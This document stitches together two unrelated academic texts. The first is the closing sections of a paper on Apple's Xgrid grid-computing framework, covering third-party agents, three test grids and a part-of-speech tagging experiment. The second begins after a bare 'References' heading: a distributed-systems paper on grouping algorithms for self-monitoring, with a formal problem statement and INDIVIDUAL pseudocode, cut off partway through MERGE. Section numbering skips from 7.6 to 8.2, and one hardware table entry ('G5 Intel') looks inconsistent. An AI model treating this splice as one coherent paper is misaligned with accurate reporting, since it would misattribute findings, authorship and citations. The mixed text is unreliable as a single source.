An Agent can belong to one virtual organisation at a time, by virtue of a relationship with a Controller. By default, an Agent will seek to bind to the first available Controller on a network, although this can be overridden with a manual directive. The Xgrid Tiger Agent defaults to “part-time” mode, only accepting jobs if there has been no keyboard activity for 15 minutes on the host on which it is installed. Alternatively, an Agent can be configured to act as a dedicated node. Agent behaviour on an individual machine is subject to the usual Unix based resource allocation mechanisms - it can be jailed or chrooted, have storage, CPU or memory quotas set, and be monitored via standard system utilities.

### 7.6 Xgrid Panther Agent

The Xgrid Panther Agent is identical to the Xgrid Tiger Agent above, except that it runs on machines installed with Mac OS X 10.3 (Panther). This is Apple’s advocated solution for enabling legacy Mac OS X based systems to be utilized in computational grids.

### 8.2 PyXG

The main functions of PyXG are as follows. Xgrid executions can be instantiated from Python scripts and Python interactive sessions. Single task and batch Xgrid jobs can be submitted and managed from within Python; available grids and their corresponding status can be queried. Active Xgrid jobs can be listed, their status queried, and administrative actions such as delete, restart etc. can be issued to jobs. The Python to Xgrid communication in PyXG is implemented through a set of Python classes that wrap the Xgrid command line directly. Thus, all xgrid parameters are available to PyXG. The Cocoa API is not used in PyXG. (The author of PyXG advises that a version of PyXG with Cocoa support is currently under development.)

### 8.3 Gridbus Data Broker Interface

Experimental support for Xgrid instantiation has been introduced in the Gridbus Data Broker (Venugopal, Buyya and Winton, 2004) since the release of version 2.2 (Assuncao et al, 2005). In essence this support equates to an XML job specification transformation from the internal Gridbus Data Broker format to match the Apple plist format, and a wrapper around the Xgrid command line interface to facilitate execution. The interested reader is referred to Assuncao et al (2005) for a more detailed treatment of the implementation and experimental evaluation.

### 8.4 XgridLite

XgridLite (Baskerville, 2005) is an extension for Mac OS X 10.4 (Tiger) which emulates a full Controller on the standard version of Mac OS X Tiger. Hence, XgridLite is a drop-in replacement for Mac OS X 10.4 (Tiger) Server’s Xgrid Controller, albeit with some feature reduction. The main features of XgridLite are the ability to manage the status of the Xgrid Controller directly; to set passwords for client and agent authentication; to administratively reset the Controller to default parameters; and to honour user preferences about output location settings. Unlike the other third party components, XgridLite is not free, but is nominally priced shareware.

### 8.5 Xgrid Linux Agent

In addition to third party components which provide alternative client interfaces to the Xgrid Controller, there is also an Xgrid Linux Agent (Cote, 2004) which extends the flexibility of an Xgrid-based computational grid to allow for alternative operating systems such as Linux. The Xgrid Linux Agent was one of the first third party components available for Xgrid. The Xgrid Linux Agent compiles on a range of Linux and Unix variants including Debian, RedHat, Solaris and OpenDarwin. Using the Xgrid Linux Agent, a native Xgrid Controller is required. Additionally, the application instances need to be constructed in such a way that they are either aware of the multi-architecture nature of the computational grid, or so that they are architecture independent.
A notable point is also that the Xgrid Linux Agent only supports operation in the passwordless authentication mode.

### 8.6 XgridAgent-Java

XgridAgent-Java (Campbell, 2005) is an Xgrid Agent written entirely in Java. The primary motivation of this project is to provide a platform independent Xgrid agent, allowing for heterogeneous Xgrid clusters to be deployed. XgridAgent-Java utilises a number of open source components including JmDNS (van Hoff and Blair, 2005), BEEPCoreJava (Franklin, 2005) and Base64 (Brower, 2005). XgridAgent-Java supports dynamic resolution of an Xgrid cluster controller via a range of Apple supported resource discovery services (ZeroConf, Rendezvous or Bonjour), all via JmDNS. BEEPCoreJava is used to handle the BEEP layer of the Xgrid protocol. Base64 is used to handle binary elements in the Apple XML plist layer of the protocol.

### 9 Experimental Experience

In evaluating the Xgrid framework, we have deployed three small scale experimental grids. The specifications for each of the relevant grids are described in the tables below, along with the location information for each node.

### 9.1 Infrastructure

In Grid 1 (Figure 3), a small cluster configuration is the infrastructure model selected, with native Xgrid components being deployed. In Grid 2 (Figure 4), we use the same cluster arrangement, hardware and operating system as in Grid 1, except we replace the native Xgrid components with relevant third-party components. In Grid 3 (Figure 5), a range of processor architectures and operating systems are featured on the Xgrid, demonstrating the considerable flexibility in building heterogeneous Xgrids using third-party components. Grid 3 is also distributed geographically, with infrastructure in multiple Australian locations, in Europe and in the USA.
A point of considerable interest in the specifications of these test grids is that, despite Xgrid being an Apple product, through the utilisation of third-party middleware bindings the Xgrid environment can be deployed across multiple hardware and software platforms. In essence, the difference between the grids is that Grid 1 was deployed using the native Xgrid components; Grid 2 was deployed using third party components over the same hardware as Grid 1; whereas Grid 3 was deployed using a combination of native and third party Xgrid 1.0 components over variable hardware and operating systems. More specifically, in Grid 1 we used the native Xgrid Command Line Interface as the Client, the native Xgrid Controller as the Controller, and the native Xgrid Agent for the Agents. By contrast, in Grid 2 we used GridStuffer as the Client, the XgridLite Controller, and XgridAgent-Java for the Agents. In Grid 3, PyXG was used as the Client, the native Xgrid Controller as the Controller, and both the Xgrid Linux Agent and XgridAgent-Java for the Agents.

### 9.2 Experiments

The experimental grids were used to perform a natural language processing task. This paper does not intend to report detailed metrics for this particular task, but rather uses it as a method of testing the Xgrid framework. For reference, the experimental task is to annotate the English Gigaword Corpus (Graff, 2002) with Part of Speech (POS) tags. The analysis and annotation is performed using the Python-based Natural Language Toolkit (Bird and Loper, 2004). The task is embarrassingly parallel in the dimension of the corpus segmentation: 314 individual files with an average size of 38 Mb per file; the total corpus is 12Gb in size. The Natural Language Toolkit is installed locally on each of the agent systems, with the input data and a processing script transferred from the client to the controller to the agents, and back at the end of the experiment.
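This kind of per-file decomposition maps naturally onto one asynchronous CLI submission per corpus segment. The sketch below is not the authors' actual harness: the directory layout, file names, and the XGRID_BIN and CONTROLLER variables are hypothetical, and XGRID_BIN defaults to echo so the loop dry-runs without a grid.

```shell
#!/bin/sh
# Hypothetical sketch: one asynchronous xgrid job per corpus segment, as one
# might do for the 314-file Gigaword task described above.
# XGRID_BIN defaults to echo (dry run); CONTROLLER is a placeholder host name.
XGRID_BIN="${XGRID_BIN:-echo}"
CONTROLLER="${CONTROLLER:-controller.example.org}"

mkdir -p corpus results
# Two placeholder segments so the dry run has something to iterate over.
printf 'demo\n' > corpus/seg01.txt
printf 'demo\n' > corpus/seg02.txt

: > job-ids.txt
for f in corpus/*; do
    # Each real submission would print a numeric job ID; collect the IDs so
    # results can later be fetched with: xgrid -job results -id <ID>
    "$XGRID_BIN" -h "$CONTROLLER" -job submit -in "$f" \
        -out "results/$(basename "$f")" >> job-ids.txt
done
```

Because submission is asynchronous, the client can disconnect after the loop and later harvest each segment's results from the controller using the recorded identifiers.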
On Grid 1 (the cluster configuration with native Xgrid components), processing the entire end-to-end task took approximately 380 minutes of wall clock time, with network transfer overhead being very low owing to the Client being on the same LAN as the Controller and Agents. On Grid 2 (the cluster configuration with third-party components), processing the entire end-to-end task took approximately 402 minutes of wall clock time; again, network transfer overhead was very low, owing to the Client being on the same LAN as the Controller and Agents. On Grid 3 (the larger distributed heterogeneous configuration), processing the entire end-to-end task took approximately 670 minutes of wall clock time. The network transfer overhead in this context was considerably higher, given the international transfers required to move data to the nodes in the USA and Europe. However, because the computational grid consisted of more nodes, naturally a greater degree of parallelism was achieved. It is interesting to note that there is only a statistically insignificant difference in elapsed time between Grid 1 and Grid 2, despite the substitution of third party components in place of native Xgrid components. Detailed instrumentation was not implemented, but anecdotal evidence suggests that the overall performance of Grid 2 using third party components is very comparable to the native Xgrid alternative. The distributed nature of the task in Grid 3 increases the overall time required to complete the task, which is not unexpected given the network transfer time for 12Gb of data, some of which is transferred to locations in the USA and Europe. While the purpose of this paper is specifically not to report experimental results, it is important to note that this scale of task can be robustly completed using either the native Xgrid components or the third-party components.
### 10 Other Use Cases

An interesting metric by which to assess the success or otherwise of the Xgrid framework is the degree to which it has been adopted. An informal survey on the xgrid-users list in July 2005 revealed a range of application domains and infrastructure models, summarised below. For reference, there were 11 responses to the survey sent to the list directly; other private replies to the Xgrid product manager may have been received. The majority of users who responded are using Xgrid 1.0 (63%), with the remainder using Technology Preview 2 with forward migration plans (37%). The size of computational grids ranged up to 300 part time (ie cycle stealing) nodes; for full time nodes, the largest grid had 60 compute nodes. The usage domains included graphics rendering; spatial analysis; modeling of biochemical receptors (Stanford University); nonlinear-system computations for a population epidemiological model (Center for Advanced Computation at Reed College); rendering POV-Ray animations of LDraw models (University of Utah Student Computing Labs); and low autocorrelation studies.

### 11 Discussion and Conclusion

This paper has offered a range of observations on specific issues with the Xgrid platform throughout. In conclusion, it is useful to generalise these observations into the relative strengths and weaknesses of the Xgrid platform. On the positive side, Xgrid represents a very low barrier to entry for grid computing - with simple setup and administration - allowing for a new range of users to effectively access the power of distributed, loosely coupled computational environments. The fact that Xgrid is already shipped standard with the operating system is a distinct further advantage. Increasingly too, native Xgrid support is being offered by application vendors (with application domains ranging from digital image processing to mathematics to bioinformatics), which allows end users to rely on vendor support directly for embarrassingly parallel computations.

This is not to say that the Xgrid framework does not have some (arguably considerable) disadvantages. Xgrid introduces another authentication paradigm which, while not incompatible with the well entrenched X.509 frameworks given appropriate middleware, is likely to represent problems for the integration of Xgrid based infrastructure with the broader grid communities. Another explicit weakness in the Xgrid framework to date is the lack of a cross platform client implementation - even clients provided by third parties currently just wrap the existing CLI. As such, Xgrid, while open at the Agent tier, is not open at the Client tier, binding users to a Mac OS X client. For extensibility of the Xgrid framework into the wider grid computing community, this issue must be addressed. Furthermore, the lack of any explicit agent capability specification, while grounded in Apple’s intention that the Xgrid framework only be deployed over its own hardware, is a significant shortcoming.

While clearly not of the same level of maturity as other widely utilised grid middleware such as Globus, the Apple Xgrid product does provide a number of advantages (particularly in the area of ease of use), which we believe will lead to widespread ad-hoc adoption within research communities and as such represents a significant advantage. Typical of Apple’s engagement with a wide range of applications, Xgrid vastly simplifies the task of building a computational grid and using a computational grid to execute tasks.
<table>
<thead>
<tr>
<th>Hardware</th>
<th>OS</th>
<th>Role</th>
<th>Software</th>
</tr>
</thead>
<tbody>
<tr>
<td>1 x G5 PPC</td>
<td>OSX 10.4</td>
<td>Controller</td>
<td>Xgrid Controller</td>
</tr>
<tr>
<td>1 x G3 PPC</td>
<td>OSX 10.4</td>
<td>Client</td>
<td>PyXG</td>
</tr>
<tr>
<td>4 x G4 PPC</td>
<td>OSX 10.4</td>
<td>Agent</td>
<td>Xgrid Tiger Agent</td>
</tr>
<tr>
<td>1 x G5 Intel</td>
<td>OSX 10.4</td>
<td>Agent</td>
<td>Xgrid Tiger Agent</td>
</tr>
<tr>
<td>1 x P4 i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x P4 i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>2 x P4 i386</td>
<td>Windows XP SP2</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x P4 i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x AMD i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x P4 i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x P4 i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x P4 i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
<tr>
<td>1 x AMD i386</td>
<td>Linux</td>
<td>Agent</td>
<td>XgridAgent-Java</td>
</tr>
</tbody>
</table>

**Figure 5: Experimental Grid 3**

**Acknowledgements**

The research in this paper has been supported by Apple Computer Inc., through the Apple University Consortium and the Apple University Development Fund. I am grateful to Ernest Prabakhar and Richard Crandall from Apple for comments on an earlier version of this paper. Additionally I wish to thank my colleagues who facilitated the availability of remote systems to use in testing the Xgrid framework: Ewan Klein at the University of Edinburgh; Terry Langendoen at the University of Arizona; Kaja Christiansen at the University of Aarhus; Paul Edwards at The University of Melbourne; and Andrew Smith at the University of Queensland.

### References
Grouping Algorithms for Scalable Self-Monitoring Distributed Systems

Benjamin Satzger and Theo Ungerer
Department of Computer Science, University of Augsburg, 86159 Augsburg, Germany
{satzger, ungerer}@informatik.uni-augsburg.de

ABSTRACT

The growing complexity of distributed systems demands new ways of control. Future systems should be able to adapt dynamically to the current conditions of their environment. They should be characterised by so-called self-x properties like self-configuring, self-healing, self-optimising, self-protecting, and context-aware behaviour. For the incorporation of such features, monitoring components typically provide the necessary information about the system's state. In this paper we propose three algorithms which allow a distributed system to install monitoring relations among its components. This serves as a basis to build scalable distributed systems with self-x features and to achieve a self-monitoring capability. Evaluation measurements have been conducted to compare the proposed algorithms.

Categories and Subject Descriptors: C.2 [Computer-Communication Networks]: Distributed Systems

General Terms: Algorithms

Keywords: grouping, failure detection, scalable, distributed system, algorithm, self-monitoring

1. INTRODUCTION

The initiatives Organic Computing (OC) [20] and Autonomic Computing (AC) [12, 13] both identify the exploding complexity as a major threat for future computer systems and postulate so-called self-x properties for these systems. To achieve these goals, both the OC [15] and the AC community [13] regard monitoring information as the basis for organic or autonomic systems.

2. RELATED WORK

To supply adequate support for large-scale systems, hierarchical failure detectors define some hierarchical organisation. Bertier et al. [3] introduce a hierarchy with two levels, a local and a global one, based on the underlying network topology. The local groups are LANs, bound together by a global group.
Within each group any member monitors all other members. Different from Bertier et al. [3], in this work the existence of some classifying concept like a LAN is not required. Monitoring groups can also be built within a network of equal nodes. A hierarchy as proposed in [3] is not further investigated in this work, but could easily be built upon the monitoring groups which are introduced later on. Another hierarchical failure detector is presented by Felber et al. [7]. They emphasise the importance of well-defined interfaces for failure detectors, being able to e.g. reuse existing failure detectors.

Gossipping is a method of information dissemination within a distributed system by information exchange with randomly chosen communication partners. In 1972, Baker and Shostak [2] discussed a gossipping system with ladies and telephones. They investigated the problem of n ladies, each of whom knows some item of gossip not known to the others. The ladies communicate by telephone, and whenever one lady calls another she tells everything she knows at that time. The problem statement was "How many calls are required before each lady knows everything?" Demers et al. [9] pioneered gossipping in computer science as a way to update and ensure consistent replicas for distributed databases.

Van Renesse et al. [14] were the first to use gossipping for failure detection to cope with the problem of scalability. In their basic algorithm each process maintains a list with a heartbeat counter for each known process. At certain intervals every process increments its own counter and selects a random process to send its list to. Upon receipt of a gossip message the received list is merged with the process's own list. Each process also maintains the last time the heartbeat counter increased for any node. If this counter has not increased for a certain time, then the process is considered to have failed.
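The heartbeat-gossipping scheme of van Renesse et al. can be sketched in a few lines. The following Python sketch is ours: the class name, the `fail_after` parameter, and the synchronous `tick` driver are illustrative assumptions, not taken from [14].

```python
import random

class GossipNode:
    """Illustrative sketch of gossip-style heartbeat failure detection
    (after van Renesse et al.); names and parameters are ours."""

    def __init__(self, node_id, all_ids, fail_after=30):
        self.id = node_id
        # one heartbeat counter per known process
        self.heartbeats = {i: 0 for i in all_ids}
        # local time at which each counter last increased
        self.last_update = {i: 0 for i in all_ids}
        self.clock = 0
        self.fail_after = fail_after  # timeout before suspecting a process

    def tick(self):
        """Each interval: bump own counter, pick a random gossip partner."""
        self.clock += 1
        self.heartbeats[self.id] += 1
        self.last_update[self.id] = self.clock
        others = [i for i in self.heartbeats if i != self.id]
        return random.choice(others)  # partner to send our list to

    def receive(self, remote_heartbeats):
        """Merge a received heartbeat list, keeping the maximum per process."""
        for i, hb in remote_heartbeats.items():
            if hb > self.heartbeats.get(i, -1):
                self.heartbeats[i] = hb
                self.last_update[i] = self.clock

    def suspected(self):
        """Processes whose counter has not increased for fail_after ticks."""
        return {i for i, t in self.last_update.items()
                if self.clock - t > self.fail_after}
```

Note how the drawback mentioned below is visible in the sketch: every message carries the full heartbeat list, so message size grows with the number of processes.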
Additionally to this basic gossipping, the authors specify a multi-level gossipping algorithm that does not choose the communication partners completely randomly but dependent on the underlying network. Basically, they try to concentrate the traffic within subnets and to decrease it across them. Thus the scalability can be further improved. A disadvantage is that the size of gossip messages grows with the number of processes, which causes relatively high network traffic. Furthermore, the timeout to prevent false detections has to be rather high, and since every process checks for failures of other processes on its own, false detections cause inconsistent information.

The SWIM protocol, based on the work of Gupta et al. [10] and described in a paper of Das et al. [5], addresses the mentioned drawbacks as it uses separate failure detector and failure dissemination components. The failure detector component detects failures while the dissemination component distributes information about processes that have recently left, joined, or failed. Each process periodically sends a ping message to some randomly chosen process and waits for it to respond. In this way failures can be detected; they are then disseminated by a separate gossip protocol. The separation of failure detection and further components as proposed in [5] is taken up in this work.

Horita et al. [11] present a scalable failure detector that creates dispersed monitoring relations among participating processes. Each process is intended to be monitored by a small number of other processes. In almost the same manner as in the systems mentioned above, separate failure detection and information propagation are used. Their protocol tries to keep each process monitored by k other processes. As typical values for k they state 4 or 5.
When a process crashes, one of the monitoring processes will detect the failure and propagate this information across the whole system. In addition to the description of their failure detector, Horita et al. compare the overheads of different failure detection organisations in their paper. The grouping mechanism of Horita et al. [11] is based on a random construction of monitoring relations: each node selects a certain number of randomly chosen nodes which then serve as its surveillants. Hence, it is not taken into account how well a node is suited to monitor another. One motivation for this work is to take such an optimality criterion into account.

Graph partitioning represents a fundamental problem arising in many scientific and technical areas. In particular, understanding the graph as a network, it is a problem closely related to the problem approached in this work. Consider each partition of a network as a group of nodes which monitor each other. A k-way partition of a weighted graph is the partitioning of the node set into k disjoint subsets so as to minimise the weight of the edges connecting nodes in different partitions. This problem is known to be NP-hard [9], while many heuristics and approximation algorithms are known which aim at producing solutions close to the optimum. However, most of these techniques are not applicable to distributed environments and are therefore unsuitable to form monitoring groups.

An algorithm capable of solving a slightly modified k-way partition problem in a distributed way is presented by Roy et al. [16]. It is based on a stochastic automaton called the influence model [1]. An influence model consists of a network of nodes which can take one of a finite number of statuses at discrete time steps. At each time step the algorithm proposed in [16] performs the following: each node picks a node as determining node with a certain probability and copies its status. By recursively performing these steps, partitions emerge.
They argue that, under some constraints, their algorithm finds partitions which converge to the optimal partition with probability 1. In this work two algorithms to partition a network into groups are introduced, which is a problem very similar to graph partitioning. However, the problem investigated here is adapted to the needs of complex distributed systems.

The contribution of this work is the introduction and evaluation of algorithms to form monitoring relations and monitoring groups respectively. The grouping component is independent of the used monitoring component. The latter could for instance be a failure detector as introduced in [17, 18] or any other mutual monitoring task. The separation of the monitoring itself and the group formation makes it possible to create generic monitoring and grouping services. As clarified in the previous section, the separation of information propagation and monitoring has been identified as an important characteristic by many researchers. In the area of scalable failure detectors, the consideration of the suitability of monitoring relations has been neglected so far. For instance, the work of Horita et al. [11] proposes to choose surveillants randomly. Taking suitability information into account can improve the performance and reduce the overhead of monitoring components like failure detectors. Related methods from graph partitioning, which in fact search for optimal relations, are too complex and slow for an application in complex systems. Furthermore, graph partitioning algorithms normally need global knowledge and are not designed to work in a distributed environment. For reliable systems a fast installation of monitoring relations is more important than eventually finding an optimal solution, especially since a network can be subject to changes, which means an optimal solution could become obsolete faster than it can be found.
To cover a wide range of different requirements and applications, dispersed monitoring relations, as arising if each node chooses its surveillants individually [11], as well as closed monitoring groups, which result from e.g. network partitioning, are studied. In the following, a precise formal definition of the stated problem is given.

3. PROBLEM STATEMENT

A monitoring network $Net$, a network of monitoring relations, is represented as a triple $(N, M, s)$, where $N$ is the set of nodes/processes of a network, $M \subseteq N \times N$ is the monitoring relation, and $s$ is a function from $N \times N$ to a real value within $[0,1]$. For each tuple $(u, v) \in N \times N$, $s(u, v)$ is the suitability of node $u$ to monitor node $v$. This suitability can depend on different aspects like the latency of a connection, the reliability of a node, its load, and so on. If a node $u$ is not able to monitor another node $v$ at all, $s(u, v)$ should output $0$. The monitoring relation defines which monitoring relations are currently established, i.e. $(u, v) \in M$ means node $u$ is currently monitoring node $v$. $(u, v) \in M$ is also denoted by $u \rightarrow v$. The relation $M$ is irreflexive, i.e. it is not allowed that a node monitors itself. The term $\rightarrow v$ is defined as the set of all nodes monitoring $v$, i.e. $\rightarrow v := \{u \in N \mid u \rightarrow v\}$. Similarly, $u \rightarrow$ denotes all nodes $u$ is monitoring, i.e. $u \rightarrow\; := \{v \in N \mid u \rightarrow v\}$.

The task of a grouping algorithm is basically, given a monitoring network $Net = (N, M, s)$ and a positive integer $m < |N|$, to establish monitoring relations such that every node of the network is monitored by at least $m$ nodes. In this work two flavours of this problem are distinguished, namely individual monitoring relations, also called dispersed monitoring relations, and closed monitoring groups.
In the former, monitoring relations can be set for each node individually, while in the latter nodes form groups with mutual monitoring relations. The number $m$ of surveillants for each node can be defined by the user. Typically, a higher number of surveillants provides higher reliability but also causes higher overhead. In Figure 1(a) an instance of individual monitoring relations of a monitoring network is illustrated with $m = 3$; the illustration of the suitability information has been omitted. Figure 1(b) shows a corresponding partition of a network into monitoring groups.

![Figure 1: Types of monitoring relations](image)

In the following, problem definitions of establishing individual monitoring relations and monitoring groups are given.

3.1 Individual monitoring relations

Given a positive integer $m$, where $m < |N|$, establish monitoring relations $M$ such that $\forall n \in N$ it holds that $|\rightarrow n| = m$. This means each node is monitored by $m$ other nodes. Furthermore, the algorithm should maximise the suitability of the grouping to establish adequate monitoring relations. Therefore the term

$$\sum_{v \in N} \sum_{u \in \rightarrow v} s(u, v)$$

should be maximised by the grouping algorithm. The optimisation of the suitability is a quality criterion for grouping algorithms, but it is not postulated that the algorithms output an optimal solution, as it is more important to find solutions in all cases as fast as possible. The term monitoring group, or simply group, in the context of individual monitoring relations can be understood as all nodes monitoring one particular node, whereas the latter is the leader of the group. Thus, in a network of $n$ nodes there are also $n$ groups: each node $v \in N$ is the leader of the group $\{v\} \cup \rightarrow v$.

3.2 Closed monitoring groups

Different from the dispersed individual monitoring relations, a closed monitoring group is a group of nodes where all members monitor each other.
This problem is very similar to a graph partitioning problem. In addition to the conditions for individual monitoring relations, constraints regarding the monitoring relation $M$ hold: $M$ must be symmetric and transitive in order to produce closed monitoring groups. In one respect, the problem of finding monitoring groups is relaxed compared to individual monitoring relations, as it is not always possible to find groups of size $m + 1$ resulting in $m$ surveillants per node in the group. If for instance a network has three nodes and monitoring groups of size 2 need to be established, this leads to an unsolvable problem. For such cases, closed monitoring groups of bigger sizes are also allowed. In detail, the condition $\forall n \in N: |\rightarrow n| = m$ is relaxed to $\forall n \in N: |\rightarrow n| \geq m$. A very simple solution to this problem is to combine the whole network into one group. This is a valid solution, as just $|\rightarrow n| \geq m$ is postulated. However, the number of surveillants per node should be as close as possible to $m$. This represents a soft constraint similar to the maximisation of the suitability criterion.

Two nodes are in the same closed monitoring group if they are monitoring each other. An additional requirement for such monitoring groups is that each group has one node which is declared as leader. Such a role is needed by many possible applications based upon grouped nodes, e.g. to have one coordinator or contact for each group. An instance where one leader per group is necessary is the formation of hierarchical groups. Whether individual monitoring relations or monitoring groups are more adequate depends on the environment and the monitoring task. Furthermore, the installed groups can also be used for many other purposes beyond monitoring, like e.g. cooperative failure recovery.
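The formal objects of the problem statement translate almost directly into code. The following Python sketch (class and method names are ours) transcribes the triple $(N, M, s)$, the sets $\rightarrow v$ and $u \rightarrow$, and the suitability objective:

```python
class MonitoringNetwork:
    """Illustrative transcription of the triple (N, M, s): N is the node
    set, M the irreflexive monitoring relation, s the suitability
    function N x N -> [0, 1]. Names are ours, not from the paper."""

    def __init__(self, nodes, suitability):
        self.N = set(nodes)
        self.M = set()          # pairs (u, v): u is monitoring v
        self.s = suitability

    def add_relation(self, u, v):
        if u == v:
            raise ValueError("M is irreflexive: a node cannot monitor itself")
        self.M.add((u, v))

    def monitored_by(self, v):
        """The set ->v of all nodes currently monitoring v."""
        return {u for (u, w) in self.M if w == v}

    def monitors(self, u):
        """The set u-> of all nodes u is currently monitoring."""
        return {w for (x, w) in self.M if x == u}

    def total_suitability(self):
        """The objective: the sum of s(u, v) over all pairs in M."""
        return sum(self.s(u, v) for (u, v) in self.M)
```

A grouping algorithm then has to fill `M` such that `len(net.monitored_by(v)) >= m` holds for every node `v`, while keeping `total_suitability()` as large as possible.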
In [19] groups of nodes are formed which plan together using an automated planning engine in order to recover the system. Such planning groups can also be established using the concepts introduced in this paper. Hence, many applications beyond monitoring are possible.

4. GROUPING ALGORITHMS

In this section three grouping algorithms are introduced: one to establish individual monitoring relations and two to form closed monitoring groups. The algorithms are tailored to solve these problems in a distributed manner. Furthermore, it is not assumed that all nodes have information about all other nodes, which would simplify the problem significantly. The nodes of a self-monitoring network $Net = (N, M, s)$ do not know about the suitability $s$, i.e. how suitable other nodes are to monitor them, until they receive a message from a node with information about that. The suitability also might change over time. In the following, the usage and relevance of suitability metrics for monitoring relations is discussed. Then, three algorithms are presented which provide the desired grouping capabilities.

To be able to establish suitable monitoring relations, the nodes of a network need information about each other. Such information might be the quality of the network connection of two nodes, the reliability of a node, and so on. Each node holds relevant information about a number of other nodes, allowing it to compute suitability information. The establishment of monitoring relations within a network $Net = (N, M, s)$ can be based on different aspects. Therefore the suitability function $s$ has to be defined accordingly. Note that the suitability information typically is not computable before nodes receive information from other nodes.
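One simple way to build $s$ from several such aspects is a normalised weighted combination. The sketch below is an illustrative assumption of ours; the paper prescribes only that $s(u, v)$ lies within $[0, 1]$:

```python
def make_suitability(factors, weights):
    """Illustrative sketch: combine several [0,1]-valued factors (e.g.
    link quality, node reliability, load) into one suitability score in
    [0,1] via a weighted average. The combination scheme is our
    assumption, not the paper's definition."""
    total = sum(weights)

    def s(u, v):
        # weighted average stays within [0, 1] if every factor does
        return sum(w * f(u, v) for f, w in zip(factors, weights)) / total

    return s
```

Dividing by the total weight keeps the result in $[0, 1]$, so the combined function remains a valid suitability function regardless of how the individual factors are weighted.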
If it is for instance desired that nodes should be monitored by nodes with similar hardware equipment and a fast network connection, the suitability function could be set to $s(u, v) = \frac{1}{2}(h(u, v) + p(u, v))$, where $h(u, v)$ returns a value within $[0, 1]$ indicating the similarity of the hardware equipment of $u$ and $v$, and $p(u, v)$ returns a value within $[0, 1]$ indicating the performance of the network connection (the average keeps $s$ within $[0, 1]$). Such a scenario would make sense if a fast network connection improves the monitoring quality and, in the case of an outage of a node, another node with similar hardware equipment is likely to be able to inherit the tasks of the failed node. Thus, the setting of the suitability function influences the establishment of monitoring relations. The definition of a suitability function should reflect the requirements of a monitoring system. All relevant factors should be included and weighted according to their importance.

Now three algorithms to establish monitoring relations in an autonomous, distributed way are presented: INDIVIDUAL, which constructs individual monitoring relations, and MERGE and SPECIES, which install monitoring groups. The idea of INDIVIDUAL is very simple: each node tries to identify the $m$ most suitable nodes and asks them to monitor it. In the initial state of the algorithm MERGE, each node forms a group consisting of one node, of which it is the leader. Groups merge successively until they reach a size greater than $m$. SPECIES distinguishes between the two species leader and non-leader. Which species a node belongs to is determined randomly. Non-leaders try to join a group, whereas each group is controlled by one leader. In the case of an inadequate ratio of leaders to non-leaders, nodes can change their species.

### 4.1 Individual

Individual monitoring relations denote monitoring responsibilities set individually for each node. Using the suitability function, nodes can identify suitable surveillants. The most suitable ones are asked to monitor the node.
Therefore, nodes send monitoring requests to other nodes and wait for their acknowledgement. This process is repeated until the node has established $m$ acknowledged monitoring relations. In Algorithm 1, the above described algorithm is formalised as pseudocode.

**Algorithm 1**

```
INDIVIDUAL
 1: id                ▷ the id of this node
 2: m                 ▷ desired number of surveillants
 3: N                 ▷ set of known nodes
 4: id→ = ∅           ▷ nodes this node is monitoring
 5: →id = ∅           ▷ nodes monitoring this node
 6: loop
 7:   if received message msg from n then
 8:     if type of msg is 'request' then
 9:       id→ = id→ ∪ {n}
10:       send ('ack', id) to n
11:     end if
12:     if type of msg is 'ack' then
13:       →id = →id ∪ {n}
14:     end if
15:   else
16:     if |→id| < m then
17:       select most suitable node n out of N \ →id
18:       send ('request', id) to n
19:     end if
20:   end if
21: end loop
```

A further requirement for individual grouping algorithms, which is omitted here, could be that each node $u$ monitoring a node $v$ needs to know all other nodes also monitoring $v$, i.e. if $u \rightarrow v$ then $u$ needs to know the set $\rightarrow v$. This might be necessary as, in the case of a failure of $v$, all monitoring nodes could e.g. have to hold some kind of vote to gather a consistent view and to plan repairing actions respectively. This feature of closed monitoring groups could easily be integrated into INDIVIDUAL. This has not been done in order to investigate the more general algorithm as stated here.
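The effect of Algorithm 1 can be reproduced centrally for illustration: each node greedily picks its $m$ most suitable known nodes as surveillants. The following Python sketch (function and parameter names are ours) omits the message passing and computes the resulting relation $M$ directly:

```python
def individual_grouping(nodes, known, s, m):
    """Illustrative, centralised sketch of the *outcome* of INDIVIDUAL:
    every node v asks its m most suitable known nodes to monitor it (in
    the paper this happens via request/ack messages). known[v] is the
    set of nodes v is aware of; names are ours."""
    M = set()
    for v in nodes:
        # rank the known candidates by their suitability to monitor v
        candidates = sorted((u for u in known[v] if u != v),
                            key=lambda u: s(u, v), reverse=True)
        if len(candidates) < m:
            raise ValueError(f"node {v} does not know m suitable nodes")
        for u in candidates[:m]:
            M.add((u, v))   # u -> v: u monitors v
    return M
```

Since every node issues exactly $m$ requests and, in this sketch, every request is acknowledged, the resulting relation satisfies $|\rightarrow v| = m$ for every node $v$.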
### 4.2 Merge

In this section the MERGE algorithm is discussed, which establishes closed monitoring groups. Within these groups all nodes monitor each other. Every group has a group leader. Typically, the initial situation is a monitoring network $Net = (N, \emptyset, s)$ without monitoring relations and a number $m$ which determines the desired number of surveillants. During the grouping of the nodes into monitoring groups, existing groups smaller than $m + 1$ merge with other groups until the resulting group has enough members. Due to a splitting mechanism, the maximal group size can be limited to $2 \cdot (m + 1) - 1$: if there exists e.g. a group of size $2 \cdot (m + 1)$, it can be split into two groups of valid size $m + 1$. The group leaders which belong to a monitoring group smaller than $m + 1$ ask suitable other group leaders to merge their groups. If this request is accepted, the groups merge, whereby the requesting group leader must give up its leadership. The requested group leader is the leader of the newly formed group. After such a merging process the group leader informs all members about the new group. Nodes which lost their leadership adopt a completely passive role in the further grouping process and are not allowed to accept merging requests from other leaders anymore.

